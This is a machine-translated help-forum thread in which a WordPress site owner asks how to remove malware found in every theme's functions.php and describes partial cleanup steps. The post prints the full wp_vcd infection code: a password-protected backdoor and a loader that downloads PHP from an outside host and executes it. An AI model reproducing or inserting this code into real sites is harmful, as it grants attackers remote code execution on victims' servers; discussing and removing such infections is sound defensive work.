0
我有一個共享主機和一些wordpress網站。 最近有時當我訪問我的網站時,彈出窗口打開。 於是我在Cpanel中打開了一個wordpress網站的模板目錄。此代碼對functions.php文件的頂部加入:我的共享主機上的所有wordpress網站的functions.php中的PHP代碼
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '220c580cc80d7d449f04533fc8f68c79'))
{
$div_code_name = "wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code9\.php/i', $file, $matcholddomain))
{
$file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default:
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
if (!function_exists('theme_temp_setup'))
{
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (!is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false)
{
if ($tmpcontent = @file_get_contents("http://www.dolsh.com/code9.php?i=" . $path))
{
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir() , "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
extract(theme_temp_setup($tmpcontent));
}
}
}
?>
所以我deteled是和彈出式問題解決了。我從functions.php所有網站的文件中刪除,但 現在的問題是,當我訪問任何網站的functions.php,代碼是在那裏,它的所有主題,甚至未使用的主題。 我能做什麼?
我做什麼上懸而未決的問題
- 在
wp-include目錄,刪除wp-vcd.php和class.wp.php文件 - 在
wp-include目錄中,打開post.php和detele第一個PHP標籤 惡意軟件增加。 - 打開主題的
functions.php文件,並刪除上面的代碼。
這應該會阻止彈出窗口。但我現在沒有多久它的工作。
我仍然沒有找到感染所有網站,但綁定找出的主要文件。
那麼你的問題是什麼? –
問題是,我該怎麼做以及如何刪除此代碼? – Meisam
因此,代碼在你刪除後重新出現? – mwweb